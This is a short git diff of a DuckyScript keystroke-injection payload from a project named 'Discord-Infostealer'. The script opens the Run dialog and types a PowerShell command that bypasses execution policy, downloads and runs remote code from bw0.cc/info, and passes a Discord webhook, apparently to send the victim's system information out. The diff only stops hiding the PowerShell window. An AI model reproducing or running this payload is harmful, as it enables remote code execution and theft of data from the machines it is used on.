diff --git a/Discord-Infostealer/System-Info-to-Discord.txt b/Discord-Infostealer/System-Info-to-Discord.txt index f5b65bc..8750147 100644 --- a/Discord-Infostealer/System-Info-to-Discord.txt +++ b/Discord-Infostealer/System-Info-to-Discord.txt @@ -14,6 +14,6 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/info) +STRING powershell -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/info) ENTER